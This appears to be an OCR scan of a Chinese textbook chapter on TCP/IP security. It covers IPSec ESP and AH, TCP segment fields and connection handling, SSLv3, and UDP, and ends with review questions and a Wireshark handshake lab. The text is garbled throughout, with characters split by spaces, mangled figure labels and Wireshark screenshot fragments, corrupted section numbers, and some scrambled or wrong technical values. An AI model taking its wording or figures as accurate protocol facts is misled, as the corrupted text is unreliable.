有 效 载荷 数据 
填 义 数据 

ESP 

E 填充 长 度 | 下 一 个 信息 头 
ESP > 
验证 验证 数据 


图 2-21 卫 数 据 包 封装 安全 有 效 载 荷 


ESP 的 头 部 包括 “安全 参数 指针 (SPD ”以 及 “序列 号 字段 ”"。 通 过 使 用 和 AH 相同 的 方 
法 ,序列 号 可 以 防止 重 放 攻击 。“ 有 效 载 荷 数据 ?字段 的 长 度 可 变 , 它 包 含 由 下 一 个 信息 头 字 
段 显示 类 型 的 数据 。“ 填 充 数据 ?字段 包含 最 长 为 255B 的 数据 。 

发 送 前 ,发 送 方 对 有 效 载荷 数据 添加 填充 数据 ,使 其 满足 以 下 三 种 需求 中 的 一 种 : OA 
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加 密 算法 常 以 64 位 长 度 为 单位 对 数据 加 密 , 最 后 不 满 64 位 的 要 添加 填充 数据 ; @ 认 证 数 
据 的 大 小 应 是 32 位 数据 的 倍数 ,不 满 32 位 数 的 ,应 添加 填充 数据 ; @ 为 防止 流量 分 析 1€ 
盖 发 送 方 所 发 出 的 有 效 载 荷 长 度 , 添 加 若干 长 度 的 填充 数据 。 


3. AH 和 ESP 相 结合 建立 交 全 连接 


AH 5 ESP 可 以 分 开 使 用 ,也 可 以 合并 使 用 。 在 虚拟 专用 网 (VPN) 中 ,AH 常用 在 主 
机 与 安全 网 关 之 间 使 用 传输 模式 ,ESP 则 在 两 个 安全 网 关 之 间 使 用 隧道 模式 。 如 果 用 户 要 
求 数据 完整 性 、 强 壮 的 认证 或 不 可 否认 性 以 及 由 ESP 提供 的 机 密 性 服务 , 则 可 以 从 主机 到 
主机 的 连接 中 将 AH 及 ESP 的 方法 相 结合 。 在 这 种 情况 下 ,AH 将 对 整个 IP 数据 包 进 行 
认证 ,而 ESP 不 对 任何 字段 进行 认证 。 

图 2-22 说 明了 两 种 模式 下 的 结合 状态 。 


IP. Au | ESP% Tees | ESPE | 
传输 模式 
IP AH | ESP [77H ESP 尾 | 
隧道 模式 


图 2-22 AH 和 ESP 的 结合 


接收 方 在 收 到 由 AH 和 ESP 结合 生成 的 IPSec 数据 包 后 ,将 进行 如 下 处 理 。Q@ 查 看 数 
据 包 的 协议 首部 , 找 出 AH 首部 后 ,再 调用 AH 处 理 程序 。@ 从 AH 分 离 SPI 信息 , 检 出 用 
于 AH 的 共享 密 钥 。 然 后 使 用 共享 密 钥 计算 验证 数据 。 接 收 方 将 计算 结果 与 被 验证 的 数 
据 作 比 较 ,如 两 者 相同 ,说 明 数据 是 完整 的 。@ 取 出 ESP 首部 及 其 中 的 SPI, 注意,ESP 首 
部 中 的 SPI 有 可 能 与 AH 中 的 SPI 不 同 。 再 次 访问 安全 关联 数据 库 , 求 得 ESP 接收 密 钥 。 
接着 ,对 有 效 数据 解密 ,恢复 为 明文 和 尾部 信息 。@ 删 去 添加 的 尾部 信息 ,将 有 效 数据 送 给 
UDP 或 TCP 字段 。 


8&.6 TCP/IP 的 TCP 安全 机 制 


传输 层 有 两 种 主要 协议 : 面向 连接 的 TCP 和 无 连接 的 UDP, UDP 在 实现 上 只 是 在 
IP 的 基础 上 增加 一 个 报头 ,不 仅 不 能 保证 数据 的 安全 传送 ,也 不 能 保证 数据 以 正确 顺序 到 
达 目 的 地 。 恰 好 相反 ,TCP 能 保证 数据 按 序 正 确 到 达 目 的 地 。 那 么 ,TCP 是 如 何 增强 数据 
传输 的 可 靠 性 呢 ? 其 数据 段 的 安全 机 制 又 是 什么 呢 ? 


2.6.1 因特网 中 TCP 数据 段 的 格式 


TCP 数据 段 的 格式 如 图 2-23 所 示 。 
TCP 数据 段 以 固定 格式 的 20B 首部 开始 ,在 首部 后 面 是 一 些 选项 和 其 填充 字 节 (以 满足 
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0 15 16 31 
源 端口 目的 端口 
Wes 
应 答 号 
U|A|P|R|S|F 
A85 ue RICS|S Y|I 窗口 大 小 
长 度 G|K|H| T|NIN 
校 验 和 紧急 指针 
选项 和 填充 字 节 
数据 (可 选 ) 


图 2-23 TCP 数据 段 格式 


32B 要 求 ) 。 在 可 选项 后 面 才 是 数据 ,如 果 有 ,最 长 为 : 65 535 一 20(IP 头 ) 一 20(TCP 3) — 
65 495B。 

不 带 数 据 的 头 部 常用 做 确认 报 文 和 控制 报 文 。 

(1) 第 一 行 标识 * 源 端口 ”和 * 目 的 端口 "。 每 个 主机 自行 决定 分 配 自己 的 端口 (从 
256 号 起 ) 。 端 口号 加 上 自身 的 IP 地 址 构成 1 个 48 位 的 唯一 IP 连接 标志 。 利 用 两 端的 套 
接 字 序号 一 起 标识 一 个 连接 。 

(2) 第 二 行 标识 要 发 送 的 “顺序 号 ”。 

O 第 三 行 表示 要 接收 的 下 一 个 字 节 (“应 答 号 ”)。 

(4) 第 四 行 含 有 丰富 的 内 容 。 其 中 “ 头 部 长 度 ” 表 示 TC 头 部 包含 多 少 个 32B。 由 于 
可 选 字段 是 变 长 的 ,因此 TCP 头 部 长 度 也 是 变化 的 。 接 着 的 6 位 保留 。 随 后 是 6 个 1 位 的 
标志 。 

第 一 个 标志 URG ,表示 从 当前 顺序 号 到 紧急 数据 位 置 的 偏 移 量 ,这 种 设置 用 于 代替 中 
断 报 文 。 如 用 到 URG , 则 该 位 置 1。 例 如 , 当 用 户 按 下 Del 或 Ctrl 十 C 中 断 键 时 ,发 送 方 在 
数据 流 中 放 入 控制 信息 ,将 其 与 URG 标志 一 起 交 给 TCP,TCP 将 停止 积累 数据 , 转 为 传输 
信息 。 当 紧急 数据 到 达 目 的 端 ,接收 方 的 应 用 程序 被 中 断 , 然 后 去 读 取 紧 急 数据 ,并 依照 结 
束 标志 而 结束 。 

第 二 个 标志 ACK, 当 ACK 为 1 时 ,表示 TCP 确认 该 数据 的 可 靠 性 ; 当 ACK 为 0 Bf. 
表示 确认 号 被 省 略 ,数据 段 不 包含 确认 信息 。 

第 三 个 标志 PSH ,表示 带 有 PSH 标志 的 数据 可 立即 送 往 应 用 程序 ,不 必 等 到 缓冲 区 装 
满 时 才 传 送 。 

第 四 个 标志 RST, 用 于 复位 。 由 于 主机 崩溃 或 其 他 原因 出 现 了 连接 错误 ,或 者 拒绝 非 
法 数据 段 或 拒绝 连接 请 求 等 情况 出 现时 ,RST 为 1。 

第 五 个 标志 SYN ,同步 位 ,用 于 建立 连接 。 在 连接 请 求 时 ,SYN=1,ACK=0; 在 连接 
响应 时 ,SYN=1,ACK=1。 

第 六 个 标志 FIN, 用 于 释放 连接 。 它 表示 发 送 方 已 发 送 完毕 。 但 是 , 当 断 开 连 接 后 , 进 
程 还 可 以 继续 接收 数据 ,用 于 连接 建立 和 断 开 的 数据 段 可 按 正确 顺序 处 理 。 

“窗口 大 小 ?字段 表示 在 确认 字 节 后 还 可 发 送 多 少 字 节 。 当 字段 值 为 0 时 ,表示 它 已 收 
到 所 有 发 送 的 数据 段 ,但 当前 接收 方 急需 暂停 ,希望 此 刻 不 要 再 发 送 。 等 待 一 段 时 间 后 , 接 
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收 方 再 发 回 一 个 带 有 


相同 确认 号 和 非 零 的 滑动 窗口 值 ,恢复 传输 操作 。 


O 第 五 行 包括 “ 校 验 和 ”与 “紧急 指针 ”。 


“ 校 验 和 ”, 是 为 


确保 高 可 靠 性 而 设置 的 。 它 校 验 头 部 ,数据 与 盆 TCP 3X; (pseudo 


header) 之 和 。 当 接收 方 对 整个 数据 段 (包括 “ 校 验 和 ”字段 ) 进 行 运算 时 ,其 结果 应 为 0。 伪 
TCP 头 包 含 源 和 目的 主机 的 TP 地 址 .TCP 的 协议 编号 (6) 和 TCP 数据 段 ( 包 含 TCP 头 ) 的 


字 节 数 。 在 校 验 和 计 


算 中 包括 伪 TCP 头 , 有 助 于 检测 传送 的 分 组 是 否 正 确 。 


“紧急 指针 ”, 用 了 


F 处理 紧 急 的 数据 (urgent data) , 它 在 标志 位 URG 的 作用 中 已 提 及 。 


URG 提醒 接收 方 在 TCP 数据 流 中 有 一 些 紧急 数据 ,而 紧急 指针 指出 它 的 具体 位 置 。 

(6) 第 六 行 可 选项 字段 允许 每 台 主 机 设 定 能 接收 的 最 大 的 TCP 载荷 能 力 。 在 建立 连 
接 期 间 , 收 发 双方 均 声明 其 最 大 载荷 能 力 ,会 选择 较 小 的 作为 标准 。 如 果 某 台 主 机 未 选择 该 
项 ,其 默认 值 为 536B 


。 所 有 因特网 上 主机 均 要 求 具有 接收 长 为 536 十 20 二 556B 的 TCP 数 


据 段 的 能 力 。 
图 2-24 显示 采集 的 TCP 数据 包头 部 每 一 个 字段 的 值 。 


lile Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
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Filter: | v] boression . Clew — Aly 


Source port: 4420 (4420) 
Destination port: http (80) 

[Stream index: 0] 

Sequence number: 1 (relative sequence number) 

Acknowledgement number: 1 (relative ack number) 

Header length: 20 bytes 

= Flags: (Xii (FIN ACK) 5000000000 
s eee = Reserved: Not set 

= Nonce: Not set 

+. = Congestion window Reduced (CWR): Not set 

ECN-Echo: Not set 

Urgent: Not set 

Acknowledgement: Set 

Push: Not set 

«o .0.. = Reset: Not set 

. +0. = Syn: Not set 


a 
由 [Expert Info (Chat/Sequence): Connection finish (FIN)] 
Window size value: 63825 
[Calculated window size: 63825] 
[window size scaling factor: -1 (unknown)] 
E Checksum: Ox45c3 [validation disabled] 
[Good Checksum: False] 
[Bad Checksum: False] 


[O Frane (fru), 5t bytes 


Profile: Default 


Packets: 308 Displayed: 308 Marked: 0 Load time: 0:0% 


图 2-24 TCP 数据 包头 部 字段 


2.6.2 TCP 服务 模型 及 其 主要 特性 


TCP 是 专门 设计 用 在 不 可 靠 的 因特网 上 提供 可 靠 的 、 端 到 端的 通信 协议 。 因 特 网 不 同 


被 设计 成 能 动态 满足 


于 局 域 网 ,不 同 部 分 可 能 具有 不 同 的 拓扑 结构 、 带 宽 、 延 迟 、 分 组 大 小 以 及 其 他 特性 。TCP 


因特网 的 要 求 , 并 且 足 以 应 对 多 种 出 错 的 情况 。 
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由 于 IP 层 不 能 保证 将 数据 包 正确 传送 到 目的 端 ,因此 ,TCP 实体 需要 判定 是 否 超时 并 
根据 需要 重 发 数据 包 。 到 达 的 数据 包 也 可 能 是 按 错误 的 顺序 传 到 的 ,这 也 要 求 TCP 实体 按 
顺序 重新 组 装 为 报 文 。 

TCP 服务 模型 由 收发 双方 主机 的 IP 地 址 及 16 位 端口 的 套 接 字 (socket) 组 成 ,一 个 套 
接 字 有 可 能 被 多 个 连接 同时 使 用 。 序 号 小 于 256 的 端口 称 为 通用 端口 。 所 有 的 TCP 连接 
均 是 全 双 工 的 和 点 到 点 的 ,TCP 不 支持 组 播 或 广播 ,TCP 连接 的 是 字 节 流 而 非 报 文 流 , 报 文 
边界 并 不 按 头 尾 衔接 方式 保存 。 

发 送 和 接收 双方 的 TCP 实体 以 数据 段 (segment) 的 形式 交换 数据 。TCP 软件 决定 数 
据 段 的 大 小 。 它 可 以 将 几 次 写 人 的 数据 归并 到 一 个 数据 段 中 或 是 将 一 次 写 和 的 数据 段 分 为 
多 个 数据 段 。 对 数据 段 大 小 的 限制 必须 满足 : 每 个 数据 段 (包括 TCP 头 在 内 ) 必 须 适 应 IP 
的 载荷 能 力 ,不 能 超过 65 535B; 每 个 网 络 都 存在 最 大 传送 单位 (MTU) ,要 求 每 个 数据 段 必 
须 适 合 MTU, MTU 一 般 为 几 千 字 节 。 因 此 ,数据 段 相 对 于 它 必须 经 过 的 网 络 太 大 时 ,就 
会 被 路 由 器 分 解 为 多 个 数据 段 。 每 个 新 的 数据 段 都 有 自己 的 TCP KA IP ks 

TCP 实体 所 用 的 基本 协议 是 滑动 窗口 协议 。 因 此 ,有 可 能 部 分 数据 段 到 达 目 的 主机 并 
获得 确认 ,但 数据 段 的 其 余部 分 丢失 了 。 另 外 ,数据 段 还 可 能 是 不 按 顺序 到 达 的 ,或 者 发 送 
方 因 定时 器 超时 而 重 发 这 些 数据 段 。 如 果 一 个 重 发 的 数据 段 和 第 一 次 发 送 时 选取 了 不 同 的 
路 由 ,并 且 分 解 的 方式 不 同 ,那么 原始 数据 段 和 重 发 数据 段 的 数据 片 可 能 分 散 到 达 , 这 需要 
十 分 细微 的 管理 机 制 才能 确保 一 个 可 靠 的 字 节 流 。 最 后 ,由 于 因特网 由 很 多 网 络 组 成 ,数据 
段 在 传输 过 程 中 难免 会 遇 上 拥塞 . 断 开 的 网 络 。 


2.6.3 TCP 解决 问题 的 策略 和 方法 
1. 建立 连接 


为 了 建立 连接 ,TCP 采用 三 次 握手 的 方法 。 首 先 , 服务 器 通过 执行 LISTEN 和 
ACCEPT 原 语 被 动 地 等 待 连接 请 求 。 另 一 方 , 若 客户 方 执 行 CONNECT 原 语 ,同时 指明 它 
想 连 接 到 的 IP 地 址 和 端口 号 ,设置 它 能 接收 的 TCP 数据 段 的 最 大 值 ,以 及 一 些 可 选 的 用 户 
数据 (如 口令 )。CONNECT 原 语 发 送 一 个 SYN=1,ACK=0 的 数据 段 到 目的 端 ,并 等 待 对 
方 响应 。 

该 数据 段 到 达 目 的 端 后 ,那里 的 TCP 实体 将 查看 是 否 有 进程 在 侦 听 目的 端口 字段 指定 
的 端口 。 如 果 没 有 , 它 将 发 送 一 个 RST=1 的 应 答 ,拒绝 建立 该 连接 。 

如 果 某 个 进程 正在 对 该 端口 进行 侦 听 , 便 将 到 达 的 TCP 数据 段 交 给 该 进程 。 它 可 以 接 
受 或 拒绝 建立 连接 。 如 果 接 受 , 便 发 回 一 个 确认 数据 段 。 至 此 ,三 次 握手 过 程 结束 , 连接 建 
AE s 

在 建立 连接 的 过 程 中 ,如 果 有 一 方 主机 崩溃 或 非法 断 开 连接 , 则 另 一 方 要 等 待 分 组 的 最 
长 生命 周期 (120s) 后 再 重新 启动 ,以 确保 没有 以 前 连接 的 分 组 仍 在 因特网 中 四 处 游荡 。 


2. 释放 连接 


为 了 释放 连接 ,连接 的 双方 均 可 发 送 一 个 FIN=1 的 TCP 数据 段 ,表明 本 方 已 无 数据 
发 送 。 当 FIN 数据 段 被 确认 后 ,该 方向 的 连接 即 被 关闭 。 然 而 数据 还 可 以 继续 朝 另 一 方 传 
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送 。 当 两 个 方向 上 的 连接 均 关闭 后 ,该 连接 就 被 完全 释放 了 。 一 般 情 况 下 ,一 个 连接 的 释放 
要 有 4 个 TCP 数据 段 : 双方 各 有 一 个 FIN 数据 段 和 一 个 ACK 数据 段 。 当 然 ,一 方 的 ACK 
数据 段 和 该 方 的 FIN 数据 段 可 看 成 一 个 数据 段 。 这 样 ,总 的 数据 段 数 可 减少 为 3 个 。 事 实 
上 ,两 个 主机 之 间 顺 序 释放 连接 和 同时 释放 连接 并 没有 本 质 的 区 别 。 

为 避免 双方 都 没有 收 到 FTN 数据 段 而 占用 线路 的 问题 , 常 使 用 定时 器 计时 。 如 果 FIN 
数据 段 的 应 答 在 两 个 最 大 分 组 生命 期 内 未 到 达 ,FIN 数据 段 的 发 送 方便 可 释放 连接 。 另 一 
方 最 终 也 会 发 现 已 无 人 侦 听 它 的 任何 信息 ,从 而 将 会 因 超时 而 释放 连接 。 


3. 滑动 窗口 机 制 


TCP 数据 段 的 传输 策略 采用 滑动 窗口 机 制 ,滑动 窗口 不 直接 受制 于 确认 信息 。 例 如 ， 
假设 接收 方 有 4096B 的 缓冲 区 。 如 果 发 送 方 传送 一 个 2048B 数据 段 并 被 正确 接收 ,那么 接 
收 方 要 确认 该 数据 段 。 然 而 ,现在 只 剩 下 2048B 的 缓冲 区 空间 ,接收 方 在 接收 新 的 数据 时 ， 
只 声明 2048B 大 小 的 窗口 。 

现在 ,发 送 方 再 传送 2048B, 且 获得 确认 。 这 时 接收 方 声明 窗口 大 小 为 0。 此 时 ,发 送 
方 必须 停止 发 送 数据 直到 接收 方 主机 上 的 应 用 程序 被 确定 从 缓冲 区 取 走 一 些 数据 后 , TCP 
才 可 以 声明 有 较 大 的 滑动 窗口 。 

当 滑动 窗口 为 0 时 ,发 送 方 一 般 不 能 再 发 送 数据 段 ,但 有 两 种 情况 除外 , 一 种 是 发 送 紧 
急 数 据 ,如 允许 用 户 终止 远程 机 上 的 运行 进程 ; 另 一 种 是 发 送 LB 数据 段 通知 接收 方 重新 声 
明 它 希望 接收 的 下 一 字 节 及 窗口 大 小 ,TCP 明确 提供 了 该 选项 ,以 防止 声明 丢失 时 出 现 死 
锁 情况 。 

发 送 方 不 需要 从 应 用 程序 一 到 来 数据 便 开始 发 送出 去 ; 接收 方 也 不 需要 尽早 发 送 确 
认 。 例 如 ,上 述 第 一 个 2KB 数据 到 达 ,TCP 知道 它 可 以 得 到 AKB 大 小 的 滑动 窗口 ,因此 , 它 
先 缓存 2KB 数据 等 到 另外 2KB 数 据 到 来 ,以 便 一 次 能 传输 4KB 的 数据 段 。 这 种 灵活 的 伟 
输 策略 ,可 以 有 效 地 改善 TCP 的 传输 性 能 ,充分 地 利用 带宽 。 


4. 数据 段 的 传送 效率 


TCP 还 采用 一 些 措施 或 算法 解决 数据 段 的 传送 效率 问题 。 目 的 是 使 发 送 方 不 发 送 数 
量 小 的 数据 段 ,而 接收 方 不 请 求 对 方 发 送 这 样 的 数据 段 。 这 样 , 对 TCP 的 访问 次 数 减少 了 ， 
总 的 开销 就 降低 了 。 


5. 如 何 处 理 错误 序号 的 数据 段 


最 后 ,接收 方 的 另 一 个 问题 是 如 何 处 理 错误 顺序 号 的 数据 段 。 例 如 ,如 果 接 收 方 接收 到 
数据 段 0.1、2、3、4、5、6 和 7, 那 么 它 可 以 先 确认 0.1.2 直到 数据 段 2 最 后 一 个 字 节 的 数据 。 
当 发 送 方 超时 后 将 重 发 数据 段 3。 如 果 接 收 方 已 缓存 了 数据 段 4 一 7, 待 收 到 数据 段 3 后 , 它 
可 以 确认 直到 数据 段 7 末尾 的 所 有 字 节 。 


2.6.4 TCP 安全 机 制 


针对 TCP/IP 的 层次 结构 及 安全 缺陷 ,因特网 工程 任务 组 (IETF) 在 传输 层 和 应 用 层 之 
间 设立 安全 套 接 层 (SSL) ,主要 目的 是 应 用 层 需要 使 用 SSL 的 安全 机 制 建立 客户 端 与 服务 
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器 之 间 安 全 的 TCP 连接 ,版 本 号 为 3 的 SSLv3 有 着 广泛 的 应 用 。 
1. SSLv3 


SSL (secure socket layer) Jj Netscape 所 研发 ,用 以 保障 在 Internet. 上 数据 传输 的 安全 ， 
利用 数据 加 密 (encryption) 技 术 , 可 确保 数据 在 网 络 上 传输 过 程 中 不 会 被 截取 及 窃听 。 目 
前 已 推出 128b 安全 标准 ,IE、Firefox 浏览 器 均 支 持 SSLv3。 从 协议 栈 层 次 关系 看 ,SSL 协 
议 位 于 传输 层 与 应 用 层 之 间 ,为 数据 通信 提供 安全 支持 ,SSL 协议 分 为 两 层 : SSL 协商 层 和 
SSL 记录 层 。 

SSL 记录 协议 (record protocol) 建 立 在 可 靠 的 传输 协议 (如 TCP) 之 上 ,为 高 层 协议 提 
供 数据 封装 ,压缩 ,加密 等 基本 功能 ; SSL 握手 协议 (handshake protocol) 建 立 在 SSL 记录 
协议 之 上 ,用 于 在 实际 的 数据 传输 开始 前 ,通信 双方 进行 身份 认证 .协商 加 密 算 法 .交换 加 密 
密 钥 等 。 

SSL 协议 提供 的 服务 主要 有 : @ 认 证 用 户 和 服务 器 ,确保 数据 发 送 到 正确 的 客户 机 和 
服务 器 ; 四 加 密 数据 以 防止 数据 中 途 被 窃取 ; 回 维护 数据 的 完整 性 ,确保 数据 在 传输 过 程 
中 不 被 改变 。 

SSL 协议 的 工作 流程 : 服务 器 认证 阶段 ,用 户 认 证 阶段 。 

服务 器 认证 阶段 : @ 客 户 端 向 服务 器 发 送 一 个 开始 信息 “Hello" 以 便 开 始 一 个 新 的 会 
话 连接 ; @ 服 务 器 根据 客户 的 信息 确定 是 否 需要 生成 新 的 主 密 钥 ,如 需要 则 服务 器 在 响应 
客户 的 "Hello" 信 息 时 将 包含 生成 主 密 钥 所 需 的 信息 ; 加 客户 根据 收 到 的 服务 器 响应 信息 ， 
产生 一 个 主 密 钥 ,并 用 服务 器 的 公开 密 钥 加 密 后 传 给 服务 器 ; 田 服务 器 恢复 该 主 密 钥 ,并 返 
回 给 客户 一 个 用 主 密 钥 认证 的 信息 ,以 此 让 客户 认证 服务 器 。 

用 户 认证 阶段 : 在 此 之 前 ,服务 器 已 经 通过 了 客户 认证 ,这 一 阶段 主要 完成 对 客户 的 
认证 ; @ 经 认证 的 服务 器 发 送 一 个 提问 给 客户 ,客户 则 返回 (数字 ) 签 名 后 的 提问 和 其 公开 
密 钥 ,从 而 向 服务 器 提供 认证 。 


2. SSLv3 协议 结构 


SSL 协议 位 于 TCP/IP 协议 模型 的 传输 层 和 应 用 层 之 间 ,使 用 TCP 来 提供 一 种 可 靠 的 
端 到 端的 安全 服务 , 它 使 客户 /服务 器 应 用 之 间 的 通信 不 被 攻击 窃听 ,并 且 始 终 对 服务 器 进 
行 认证 ,还 可 以 选择 对 客户 进行 认证 。SSL 协议 在 应 用 层 通 信之 前 就 已 经 完成 加 密 算法 、 
通信 密 钥 的 协商 以 及 服务 器 认证 工作 ,在 此 之 后 ,应 用 层 协议 所 传送 的 数据 都 被 加 密 。 

SSLv3 是 一 个 协议 套件 ,从 体系 结构 (图 2-25) 可 以 看 出 ,SSL 是 由 SSL 握手 协议 .SSL 
修改 密 文 协议 (change cipher spec), SSL 告警 协议 (alert) 和 SSL 记录 协议 组 成 的 一 个 协 
议 族 。 


握手 协议 修改 密 文 协 议 | 报警 协议 
SSL 记录 协议 
TCP 
IP 


图 2-25 SSL 体系 结构 
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SSL 握手 协议 允许 通信 实体 在 交换 应 用 数据 之 前 协商 密 钥 的 算法 ,加密 密 钥 和 对 客户 
端 进行 认证 (可 选 ) 的 协议 ,为 下 一 步 记录 协议 要 使 用 的 密 钥 信息 进行 协商 ,使 客户 端 和 服务 
器 建立 并 保持 安全 通信 的 状态 信息 。SSL 握手 协议 是 在 任何 应 用 程序 数据 传输 之 前 使 用 
的 ,SSL 握手 协议 包含 四 个 阶段 : 第 一 个 阶段 建立 安全 能 力 , 第 二 个 阶段 进行 服务 器 鉴别 和 
密 钥 交 换 ,第 三 个 阶段 进行 客户 鉴别 和 密 钥 交换 ,第 四 个 阶段 完成 握手 协议 。 

SSL 修改 密 文 协议 是 使 用 SSL 记录 协议 服务 的 SSL 高 层 协议 的 三 个 特定 协议 之 一 ,也 
是 其 中 最 简单 的 一 个 。 协 议 由 单个 消息 组 成 ,消息 只 包含 一 个 值 为 1 的 单个 字 节 。 该 消息 
的 唯一 作用 就 是 使 未 决 状态 复制 为 当前 状态 ,更 新 用 于 当前 连接 的 密码 组 。 

SSL 告警 协议 是 用 来 为 对 等 实体 传递 SSL 的 相关 警告 。 如 果 在 通信 过 程 中 某 一 方 发 
现任 何 异 常 ,就 需要 给 对 方 发 送 一 条 警示 消息 通告 。 警 示 消息 有 两 种 : 第 一 种 是 Fatal fi 
误 ,如 传递 数据 过 程 中 ,发 现 错误 的 MAC, 双 方 就 需要 立即 中 断 会 话 , 同 时 消除 自己 缓冲 区 
相应 的 会 话 记录 ; 第 二 种 是 Warning 消息 ,这 种 情况 ,通信 双方 通常 都 只 是 记录 日 志 , 而 对 
通信 过 程 不 造成 任何 影响 。SSL 握手 协议 可 以 使 得 服务 器 和 客户 能 够 相互 鉴别 对 方 ,协商 
具体 的 加 密 算 法 和 MAC 算法 以 及 保密 密 钥 ,用 来 保护 在 SSL 记录 中 发 送 的 数据 。 

SSL 记录 协议 为 SSL 连接 提供 了 两 种 服务 : 一 是 机 密 性 ,二 是 消息 完整 性 。 为 了 实现 
这 两 种 服务 ，SSL 记录 协议 对 接收 的 数据 和 被 接收 的 数据 工作 过 程 是 如 何 实现 的 呢 ? SSL 
记录 协议 接收 传输 的 应 用 报 文 ,将 数据 分 片 成 可 管理 的 块 ,进行 数据 压缩 (可 选 ) ,应 用 
MAC ,接着 利用 DES 或 其 他 加 密 算法 进行 数据 加 密 ,最 后 增加 由 内 容 类 型 .主要 版 本 ,次 要 
版 本 和 压缩 长 度 组 成 的 首部 。 被 接收 的 数据 刚好 与 接收 数据 工作 过 程 相反 ,依次 被 解密 、 验 
证 ,解压 缩 和 重新 装配 ,然后 交 给 更 高 级 用 户 。 


2.2 TCP/IP 的 UDP 安全 性 分 析 


UDP 向 应 用 程序 提供 一 种 发 送 封装 的 原始 IP 数据 报 的 方法 ,并 且 发 送 时 无 须 建立 连 
接 。 很 多 有 一 个 请 求 和 一 个 响应 的 客户 /服务 器 应 用 程序 采用 UDP, 这样 可 以 避免 建立 和 
释放 连接 的 麻烦 。 

一 个 UDP 数据 包 包括 一 个 8B 的 头 部 和 数据 部 分 。 两 个 端口 的 作用 与 TCP 中 的 相 
同 ,是 用 来 标明 源 端 和 目的 端的 两 个 端口 。“UDP 长 度 "字段 指明 包括 8B 的 头 及 数据 在 内 
的 数据 段 长 度 。“UDP 校 验 和 ”字段 包括 伪 UDP 3k, UDP 头 和 UDP 数据 ,UDP 协议 使 用 
校 验 和 来 保证 数据 的 安全 ; 校 验 和 首先 在 数据 发 送 方 通过 特殊 算法 计算 得 出 ,在 传递 到 接 
收 方 之 后 ,还 需要 重新 计算 ,如 果 发 送 方 和 接收 方 计算 的 校 验 值 不 相等 ,数据 包 在 传输 过 程 
中 被 算 改 或 损坏 。 

UDP 头 部 的 格式 如 图 2-26 所 示 。 图 2-27 显示 采集 的 UDP 数据 包头 部 每 一 个 字段 
的 值 。 


PA 


0 16 31 
源 端口 目的 端口 
UDP 长 度 UDP 校 验 和 


图 2-26 UDP 头 部 的 格式 


第 2 章 TCP/1P 分 析 NY 


File Edit Vier Go Capture Analyze Statistics Telephony Tools Inti 


Hara Huxc22se9eTi 


Po 
BiaeaamawumxiH 
Filter: | Bpression . cier dorty 

No. 


3 4.447237 。 192.168.1.100 88.95.. 54 4420 > http [FIN, ACK] Seq=1 Ackel Win=63825 Len=0 
4 4.447249 — 192.168.1.100 54 4420 > http [FIN, ACK] Seq=1 Ack=1 Win=63825 Len=0 


674 


3» Frame 5: 62 bytes on wire (496 bits), 62 bytes captured (496 bits) ^ 
由 Ethernet II, Src: IntelCor 85:1f:b7 (00:13:20:85:1f:b7), Dst: IPvámcast 22:17:ea (01:00:5e:22:17:e8) F 
四 Internet Protocol, Src: 192.168.1.100 (192.168.1.100), Dst: 234.34.23.234 (234.34.23.234) | 
Gi User Datagram Protocol, Src Port: 4466 (4466), Dst Port: 33674 (33674) L 
Source port: 4466 (4466) 
Destination port: 33674 (33674) [| 
Length: 28 B 
S Checksum: 0x75af [validation disabled] 
[Good Checksum: False] 
[Bad Checksum: False] 图 | 


0000 01 00 Se 22 17 ea 00 13 20 85 1f b7 08 00 45 00 . 
0010 00 30 2c 30 00 00 01 11 c9 74 CO a8 01 64 eaà 22 . 
0020 17 ea 11 72 83 8a 00 1c 75 af 10 00 00 002€ 31  .. 
0030 bs 91 ac 4f 76 12 34 13 16 fb 19 8b b7 32 


Tile: "C:\Documents and SettingsWdanin… 


图 2-27 UDP 数据 包头 部 字段 


ELE 


.为 什么 说 TCP/IP 存在 着 安全 缺陷 ? 

. 简 述 TCP 建立 连接 的 过 程 ,分 析 建 立 连接 过 程 中 可 能 出 现 的 安全 问题 。 
. 简 述 IPv4 的 地 址 分 类 规则 及 各 类 地 址 的 范围 。 

. 有 关 IP 安全 机 制 涉 及 哪些 方面 ? 

. IP 是 如 何 提供 保密 服务 的 ? 

. TCP 的 服务 模型 是 什么 ?有 何 特 点 ? 

. 简 述 TCP 的 数据 传输 策略 。 

. 什么 是 UDP? 哪些 网 络 服务 利用 UDP? 


Qo -3 Oo ch & c 性 


&u 2.1 Wireshark 分 析 TCP 三 次 握手 建立 连接 过 程 


【 实 训 目的 】 

(1) 学 会 Wireshark 的 使 用 方法 ,掌握 利用 Wireshark 捕获 和 分 析 数 据 包 的 方法 。 
(2) 加 深 理解 TCP 三 次 握手 过 程 ,了 解 网 络 协 议 的 工作 原理 。 

(3) 加 深 理解 P、TCP 等 数据 包 格 式 。 

(D 了 解 HTTP 等 应 用 层 协 议 的 数据 包 传输 模式 。 
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【 实 训 环境 】 
一 台 运 行 Windows 操作 系统 并 与 Internet 相连 的 计算 机 。 
【 实 训 内 容 】 


1. TCP 三 次 握手 


通常 TCP 连接 的 建立 ,需要 三 次 握手 。TCP 连接 的 建立 过 程 如 下 。@ 客 户 端 发 送 一 
个 SYN 报 文 段 指 明 客户 连接 的 服务 器 的 端口 ,以 及 初始 序号 ISN ,这 个 SYN 段 称 为 报 文 段 
1。@@ 服 务 器 发 回 包含 服务 器 的 初始 序号 的 SYN 报 文 段 ( 报 文 段 2) 作 为 应 答 。 同 时 ,将 确 
认 序 号 设置 为 客户 的 ISN 加 1 以 对 客户 的 SYN 报 文 段 进 行 确认 。 一 个 SYN 将 占用 一 个 
序号 。@ 客 户 必须 将 确认 序号 设置 为 服务 器 的 ISN 加 1 以 对 服务 器 的 SYN 报 文 进行 确认 
( 报 文 段 3)。 这 个 连接 建成 后 ,一 直 保持 活动 状态 ,直到 超时 或 任何 一 方 发 出 FIN( 结 束 ) 
信号 。 


2. 过 滤 数 据 包 
从 图 2-15 捕获 的 数据 包 中 ,过滤 TCP 数据 包 显 示 的 信息 如 图 2-28 所 示 。 


lile Edit View Go Capture Analyze Statistics Telephony Iocls Internals Help 


CE 


Filter: | tep M Expression.. Clear Appl 
No. Tine Source Destination Protocol Length Info 
254028 — 192.168 0 — 220 TCP 66 emsd-port > http [SYN] Seq-0 Win-é4240 
15 3.254274  192.168.1.100 220.181.126.53 TCP 66 emsd-port > http [SYN] Seq=0 winzé4240 L 


16 3.290585  220.181.126.53  192.168.1.100 TCP 66 http > emsd-port [SYN, ACK] Seq=0 Ack=1 
